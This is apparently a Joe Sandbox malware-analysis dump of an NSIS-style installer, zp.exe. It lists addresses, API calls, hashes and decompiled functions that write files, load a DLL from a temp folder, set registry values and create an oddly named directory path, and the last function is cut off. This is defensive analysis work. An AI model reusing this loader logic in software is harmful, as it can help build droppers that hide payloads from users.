                                                            0x00000000
                                                            0x004030d5
                                                            0x004030db
                                                            0x004030e5
                                                            0x004030fb
                                                            0x00403100
                                                            0x00403105
                                                            0x0040310b
                                                            0x00403111
                                                            0x0040311b
                                                            0x00403122
                                                            0x00000000
                                                            0x00000000
                                                            0x00403124
                                                            0x0040312a
                                                            0x0040312c
                                                            0x00403160
                                                            0x00403166
                                                            0x00000000
                                                            0x00000000
                                                            0x00403168
                                                            0x0040316a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040316c
                                                            0x0040316c
                                                            0x0040317f
                                                            0x00000000
                                                            0x00000000
                                                            0x0040318e
                                                            0x00000000
                                                            0x0040318e
                                                            0x0040313c
                                                            0x00403144
                                                            0x0040319b
                                                            0x004031a1
                                                            0x004031a1
                                                            0x00000000
                                                            0x0040314c
                                                            0x0040314c
                                                            0x00403152
                                                            0x00403158
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040315e
                                                            0x0040319f
                                                            0x0040319f
                                                            0x00000000
                                                            0x0040319f
                                                            0x00000000

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 0040304F
                                                              • Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
                                                            • WriteFile.KERNELBASE(090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000,004101B9,00000000,00000000,00412888,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
                                                            • SetFilePointer.KERNELBASE(000044FF,00000000,00000000,00412888,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E
                                                            Strings
                                                            • 090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000, xrefs: 00403094, 00403135
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: File$Pointer$CountTickWrite
                                                            • String ID: 090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000
                                                            • API String ID: 2146148272-2221801228
                                                            • Opcode ID: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                            • Instruction ID: d344cd596d8d4dd0b43dc6914abeb17836bbf3c0912801dceac3b69aa1d0b3ec
                                                            • Opcode Fuzzy Hash: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                            • Instruction Fuzzy Hash: 7841C3729042019FD710AF29EE849663FFCF74835A711813BE414B72E0D7399D529B9E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 656 401f68-401f74 657 401f7a-401f90 call 4029fd * 2 656->657 658 40202f-402031 656->658 667 401f92-401f9d GetModuleHandleA 657->667 668 401f9f-401fad LoadLibraryExA 657->668 659 40217c-402181 call 401423 658->659 665 402892-4028a1 659->665 667->668 670 401faf-401fbc GetProcAddress 667->670 668->670 671 402028-40202a 668->671 673 401ffb-402000 call 404fc9 670->673 674 401fbe-401fc4 670->674 671->659 678 402005-402008 673->678 676 401fc6-401fd2 call 401423 674->676 677 401fdd-401ff4 call 100016da 674->677 676->678 686 401fd4-401fdb 676->686 681 401ff6-401ff9 677->681 678->665 682 40200e-402016 call 403707 678->682 681->678 682->665 687 40201c-402023 FreeLibrary 682->687 686->678 687->665
                                                            C-Code - Quality: 60%
                                                            			E00401F68(void* __ebx, void* __eflags) {
                                                            				struct HINSTANCE__* _t18;
                                                            				struct HINSTANCE__* _t26;
                                                            				void* _t27;
                                                            				struct HINSTANCE__* _t30;
                                                            				CHAR* _t32;
                                                            				intOrPtr* _t33;
                                                            				void* _t34;
                                                            
                                                            				_t27 = __ebx;
                                                            				asm("sbb eax, 0x423798");
                                                            				 *(_t34 - 4) = 1;
                                                            				if(__eflags < 0) {
                                                            					_push(0xffffffe7);
                                                            					L15:
                                                            					E00401423();
                                                            					L16:
                                                            					 *0x423768 =  *0x423768 +  *(_t34 - 4);
                                                            					return 0;
                                                            				}
                                                            				_t32 = E004029FD(0xfffffff0);
                                                            				 *(_t34 + 8) = E004029FD(1);
                                                            				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
                                                            					L3:
                                                            					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                            					_t30 = _t18;
                                                            					if(_t30 == _t27) {
                                                            						_push(0xfffffff6);
                                                            						goto L15;
                                                            					}
                                                            					L4:
                                                            					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                            					if(_t33 == _t27) {
                                                            						E00404FC9(0xfffffff7,  *(_t34 + 8));
                                                            					} else {
                                                            						 *(_t34 - 4) = _t27;
                                                            						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
                                                            							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40a7b4, "`7B"); // executed
                                                            						} else {
                                                            							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
                                                            							if( *_t33() != 0) {
                                                            								 *(_t34 - 4) = 1;
                                                            							}
                                                            						}
                                                            					}
                                                            					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E00403707(_t30) != 0) {
                                                            						FreeLibrary(_t30);
                                                            					}
                                                            					goto L16;
                                                            				}
                                                            				_t26 = GetModuleHandleA(_t32); // executed
                                                            				_t30 = _t26;
                                                            				if(_t30 != __ebx) {
                                                            					goto L4;
                                                            				}
                                                            				goto L3;
                                                            			}










                                                            0x00401f68
                                                            0x00401f68
                                                            0x00401f6d
                                                            0x00401f74
                                                            0x0040202f
                                                            0x0040217c
                                                            0x0040217c
                                                            0x00402892
                                                            0x00402895
                                                            0x004028a1
                                                            0x004028a1
                                                            0x00401f83
                                                            0x00401f8d
                                                            0x00401f90
                                                            0x00401f9f
                                                            0x00401fa3
                                                            0x00401fa9
                                                            0x00401fad
                                                            0x00402028
                                                            0x00000000
                                                            0x00402028
                                                            0x00401faf
                                                            0x00401fb8
                                                            0x00401fbc
                                                            0x00402000
                                                            0x00401fbe
                                                            0x00401fc1
                                                            0x00401fc4
                                                            0x00401ff4
                                                            0x00401fc6
                                                            0x00401fc9
                                                            0x00401fd2
                                                            0x00401fd4
                                                            0x00401fd4
                                                            0x00401fd2
                                                            0x00401fc4
                                                            0x00402008
                                                            0x0040201d
                                                            0x0040201d
                                                            0x00000000
                                                            0x00402008
                                                            0x00401f93
                                                            0x00401f99
                                                            0x00401f9d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                                              • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                              • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                              • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,00000000,00000000), ref: 00405025
                                                              • Part of subcall function 00404FC9: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll), ref: 00405037
                                                              • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                              • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                              • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                            • String ID: `7B
                                                            • API String ID: 2987980305-3208876730
                                                            • Opcode ID: 201cf913fe3424f9cc0766cc668a4e4f41d460d18a5e3c080de9af1d3ac2d500
                                                            • Instruction ID: f6a91bdf01fdb4a856c4cb7ab8675b48806981152caa269ce110007ec06e39c8
                                                            • Opcode Fuzzy Hash: 201cf913fe3424f9cc0766cc668a4e4f41d460d18a5e3c080de9af1d3ac2d500
                                                            • Instruction Fuzzy Hash: 3321D872904215F6CF107FA4CE4DA6E79B0AB44358F60823BF601B62D0DBBD4941DA5E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 689 40231c-402362 call 402af2 call 4029fd * 2 RegCreateKeyExA 696 402892-4028a1 689->696 697 402368-402370 689->697 698 402380-402383 697->698 699 402372-40237f call 4029fd lstrlenA 697->699 702 402393-402396 698->702 703 402385-402392 call 4029e0 698->703 699->698 705 4023a7-4023bb RegSetValueExA 702->705 706 402398-4023a2 call 402f1f 702->706 703->702 710 4023c0-402496 RegCloseKey 705->710 711 4023bd 705->711 706->705 710->696 714 402663-40266a 710->714 711->710 714->696
                                                            C-Code - Quality: 90%
                                                            			E0040231C(void* __eax) {
                                                            				void* _t15;
                                                            				char* _t18;
                                                            				int _t19;
                                                            				long _t22;
                                                            				char _t24;
                                                            				int _t27;
                                                            				intOrPtr _t35;
                                                            				void* _t37;
                                                            
                                                            				_t15 = E00402AF2(__eax);
                                                            				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                                                            				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                                                            				 *(_t37 - 0x44) = E004029FD(2);
                                                            				_t18 = E004029FD(0x11);
                                                            				_t31 =  *0x423790 | 0x00000002;
                                                            				 *(_t37 - 4) = 1;
                                                            				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423790 | 0x00000002, _t27, _t37 + 8, _t27); // executed
                                                            				if(_t19 == 0) {
                                                            					if(_t35 == 1) {
                                                            						E004029FD(0x23);
                                                            						_t19 = lstrlenA(0x409bb0) + 1;
                                                            					}
                                                            					if(_t35 == 4) {
                                                            						_t24 = E004029E0(3);
                                                            						 *0x409bb0 = _t24;
                                                            						_t19 = _t35;
                                                            					}
                                                            					if(_t35 == 3) {
                                                            						_t19 = E00402F1F(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x409bb0, 0xc00);
                                                            					}
                                                            					_t22 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x409bb0, _t19); // executed
                                                            					if(_t22 == 0) {
                                                            						 *(_t37 - 4) = _t27;
                                                            					}
                                                            					_push( *(_t37 + 8));
                                                            					RegCloseKey();
                                                            				}
                                                            				 *0x423768 =  *0x423768 +  *(_t37 - 4);
                                                            				return 0;
                                                            			}











                                                            0x0040231d
                                                            0x00402322
                                                            0x0040232c
                                                            0x00402336
                                                            0x00402339
                                                            0x00402349
                                                            0x00402353
                                                            0x0040235a
                                                            0x00402362
                                                            0x00402370
                                                            0x00402374
                                                            0x0040237f
                                                            0x0040237f
                                                            0x00402383
                                                            0x00402387
                                                            0x0040238d
                                                            0x00402392
                                                            0x00402392
                                                            0x00402396
                                                            0x004023a2
                                                            0x004023a2
                                                            0x004023b3
                                                            0x004023bb
                                                            0x004023bd
                                                            0x004023bd
                                                            0x004023c0
                                                            0x00402490
                                                            0x00402490
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                                            • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateValuelstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp
                                                            • API String ID: 1356686001-746621221
                                                            • Opcode ID: 8fb3e0f7f11e38496f68fef7312eb5468912eb9ef26bee94d7414f60837b7186
                                                            • Instruction ID: 9c4c752beb0f8e8bc138c26b394c9166cd94382eb1b14f60ad9d974daee8f686
                                                            • Opcode Fuzzy Hash: 8fb3e0f7f11e38496f68fef7312eb5468912eb9ef26bee94d7414f60837b7186
                                                            • Instruction Fuzzy Hash: C61172B1E00118BFEB10AFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D01AB68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 715 4015b3-4015c6 call 4029fd call 405807 720 4015c8-4015e3 call 405799 CreateDirectoryA 715->720 721 40160a-40160d 715->721 728 401600-401608 720->728 729 4015e5-4015f0 GetLastError 720->729 723 401638-402181 call 401423 721->723 724 40160f-40162a call 401423 call 405cde SetCurrentDirectoryA 721->724 736 402892-4028a1 723->736 724->736 739 401630-401633 724->739 728->720 728->721 732 4015f2-4015fb GetFileAttributesA 729->732 733 4015fd 729->733 732->728 732->733 733->728 739->736
                                                            C-Code - Quality: 85%
                                                            			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                                            				struct _SECURITY_ATTRIBUTES** _t12;
                                                            				int _t18;
                                                            				int _t21;
                                                            				struct _SECURITY_ATTRIBUTES* _t22;
                                                            				signed char _t24;
                                                            				struct _SECURITY_ATTRIBUTES* _t25;
                                                            				CHAR* _t27;
                                                            				struct _SECURITY_ATTRIBUTES** _t31;
                                                            				void* _t32;
                                                            
                                                            				_t25 = __ebx;
                                                            				_t27 = E004029FD(0xfffffff0);
                                                            				_t12 = E00405807(_t27);
                                                            				_t29 = _t12;
                                                            				if(_t12 != __ebx) {
                                                            					do {
                                                            						_t31 = E00405799(_t29, 0x5c);
                                                            						 *_t31 = _t25;
                                                            						 *((char*)(_t32 + 0xb)) =  *_t31;
                                                            						_t21 = CreateDirectoryA(_t27, _t25); // executed
                                                            						if(_t21 == 0) {
                                                            							if(GetLastError() != 0xb7) {
                                                            								L4:
                                                            								 *((intOrPtr*)(_t32 - 4)) =  *((intOrPtr*)(_t32 - 4)) + 1;
                                                            							} else {
                                                            								_t24 = GetFileAttributesA(_t27); // executed
                                                            								if((_t24 & 0x00000010) == 0) {
                                                            									goto L4;
                                                            								}
                                                            							}
                                                            						}
                                                            						_t22 =  *((intOrPtr*)(_t32 + 0xb));
                                                            						 *_t31 = _t22;
                                                            						_t29 =  &(_t31[0]);
                                                            					} while (_t22 != _t25);
                                                            				}
                                                            				if( *((intOrPtr*)(_t32 - 0x20)) == _t25) {
                                                            					_push(0xfffffff5);
                                                            					E00401423();
                                                            				} else {
                                                            					E00401423(0xffffffe6);
                                                            					E00405CDE("C:\\Users\\Arthur\\Vkstcentrene\\unprotuberant\\Benediktinerklostrets\\Rehandles\\Abortionist\\Korses", _t27);
                                                            					_t18 = SetCurrentDirectoryA(_t27); // executed
                                                            					if(_t18 == 0) {
                                                            						 *((intOrPtr*)(_t32 - 4)) =  *((intOrPtr*)(_t32 - 4)) + 1;
                                                            					}
                                                            				}
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t32 - 4));
                                                            				return 0;
                                                            			}












                                                            0x004015b3
                                                            0x004015ba
                                                            0x004015bd
                                                            0x004015c2
                                                            0x004015c6
                                                            0x004015c8
                                                            0x004015d0
                                                            0x004015d6
                                                            0x004015d8
                                                            0x004015db
                                                            0x004015e3
                                                            0x004015f0
                                                            0x004015fd
                                                            0x004015fd
                                                            0x004015f2
                                                            0x004015f3
                                                            0x004015fb
                                                            0x00000000
                                                            0x00000000
                                                            0x004015fb
                                                            0x004015f0
                                                            0x00401600
                                                            0x00401603
                                                            0x00401605
                                                            0x00401606
                                                            0x004015c8
                                                            0x0040160d
                                                            0x00401638
                                                            0x0040217c
                                                            0x0040160f
                                                            0x00401611
                                                            0x0040161c
                                                            0x00401622
                                                            0x0040162a
                                                            0x00401630
                                                            0x00401630
                                                            0x0040162a
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                              • Part of subcall function 00405807: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,?,00405873,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,?,?,776C2EE0,004055BE,?,C:\Users\user\AppData\Local\Temp\,776C2EE0,00000000), ref: 00405815
                                                              • Part of subcall function 00405807: CharNextA.USER32(00000000), ref: 0040581A
                                                              • Part of subcall function 00405807: CharNextA.USER32(00000000), ref: 0040582E
                                                            • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                            • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses,00000000,00000000,000000F0), ref: 00401622
                                                            Strings
                                                            • C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses, xrefs: 00401617
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                            • String ID: C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses
                                                            • API String ID: 3751793516-3466177333
                                                            • Opcode ID: 89d0ce7e600e8662a05959566325a5d33867861d9ae3ac1bc10afdb4933677a5
                                                            • Instruction ID: c68c5a489683e2fc4659e16c9c4aaa0bba9656052562f70290055e8dde3f70bb
                                                            • Opcode Fuzzy Hash: 89d0ce7e600e8662a05959566325a5d33867861d9ae3ac1bc10afdb4933677a5
                                                            • Instruction Fuzzy Hash: E011E532908150ABDB117F755D4496F77B4EA62366728473FF891B22E2C23C4D42DA3E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 741 40599e-4059a8 742 4059a9-4059d4 GetTickCount GetTempFileNameA 741->742 743 4059e3-4059e5 742->743 744 4059d6-4059d8 742->744 746 4059dd-4059e0 743->746 744->742 745 4059da 744->745 745->746
                                                            C-Code - Quality: 100%
                                                            			E0040599E(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                            				char _t11;
                                                            				signed int _t12;
                                                            				int _t15;
                                                            				signed int _t17;
                                                            				void* _t20;
                                                            				CHAR* _t21;
                                                            
                                                            				_t21 = _a4;
                                                            				_t20 = 0x64;
                                                            				while(1) {
                                                            					_t11 =  *0x409380; // 0x61736e
                                                            					_t20 = _t20 - 1;
                                                            					_a4 = _t11;
                                                            					_t12 = GetTickCount();
                                                            					_t17 = 0x1a;
                                                            					_a6 = _a6 + _t12 % _t17;
                                                            					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                            					if(_t15 != 0) {
                                                            						break;
                                                            					}
                                                            					if(_t20 != 0) {
                                                            						continue;
                                                            					}
                                                            					 *_t21 =  *_t21 & 0x00000000;
                                                            					return _t15;
                                                            				}
                                                            				return _t21;
                                                            			}









                                                            0x004059a2
                                                            0x004059a8
                                                            0x004059a9
                                                            0x004059a9
                                                            0x004059ae
                                                            0x004059af
                                                            0x004059b2
                                                            0x004059bc
                                                            0x004059c9
                                                            0x004059cc
                                                            0x004059d4
                                                            0x00000000
                                                            0x00000000
                                                            0x004059d8
                                                            0x00000000
                                                            0x00000000
                                                            0x004059da
                                                            0x00000000
                                                            0x004059da
                                                            0x00000000

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 004059B2
                                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059CC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: "C:\Users\user\Desktop\zp.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                            • API String ID: 1716503409-4175375536
                                                            • Opcode ID: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
                                                            • Instruction ID: 8c160f2977bc4404c48c8444970ea7289898f808bb444fb2a57fa0af4f665f22
                                                            • Opcode Fuzzy Hash: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
                                                            • Instruction Fuzzy Hash: 4AF08976748304ABD7105F55DC04B9B7B98EF91760F148037F904DB180D5B49954C765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 747 406109-40612c 748 406136-406139 747->748 749 40612e-406131 747->749 751 40613c-406145 748->751 750 406b56-406b5a 749->750 752 406b53 751->752 753 40614b 751->753 752->750 754 406152-406156 753->754 755 406292-406939 753->755 756 4061f7-4061fb 753->756 757 406267-40626b 753->757 761 40615c-406169 754->761 762 406b3e-406b51 754->762 767 406953-406969 755->767 768 40693b-406951 755->768 759 406201-40621a 756->759 760 406aa7-406ab1 756->760 763 406271-406285 757->763 764 406ab6-406ac0 757->764 766 40621d-406221 759->766 760->762 761->752 769 40616f-4061b5 761->769 762->750 765 406288-406290 763->765 764->762 765->755 765->757 766->756 771 406223-406229 766->771 770 40696c-406973 767->770 768->770 772 4061b7-4061bb 769->772 773 4061dd-4061df 769->773 780 406975-406979 770->780 781 40699a-4069a6 770->781 778 406253-406265 771->778 779 40622b-406232 771->779 774 4061c6-4061d4 GlobalAlloc 772->774 775 4061bd-4061c0 GlobalFree 772->775 776 4061e1-4061eb 773->776 777 4061ed-4061f5 773->777 774->752 782 4061da 774->782 775->774 776->776 776->777 777->766 778->765 783 406234-406237 GlobalFree 779->783 784 40623d-40624d GlobalAlloc 779->784 785 406b28-406b32 780->785 786 40697f-406997 780->786 781->751 782->773 783->784 784->752 784->778 785->762 786->781
                                                            C-Code - Quality: 98%
                                                            			E00406109(void* __ecx) {
                                                            				void* _v8;
                                                            				void* _v12;
                                                            				signed int _v16;
                                                            				unsigned int _v20;
                                                            				signed int _v24;
                                                            				signed int _v28;
                                                            				signed int _v32;
                                                            				signed int _v36;
                                                            				signed int _v40;
                                                            				signed int _v44;
                                                            				signed int _v48;
                                                            				signed int _v52;
                                                            				signed int _v56;
                                                            				signed int _v60;
                                                            				signed int _v64;
                                                            				signed int _v68;
                                                            				signed int _v72;
                                                            				signed int _v76;
                                                            				signed int _v80;
                                                            				signed int _v84;
                                                            				signed int _v88;
                                                            				signed int _v92;
                                                            				signed int _v95;
                                                            				signed int _v96;
                                                            				signed int _v100;
                                                            				signed int _v104;
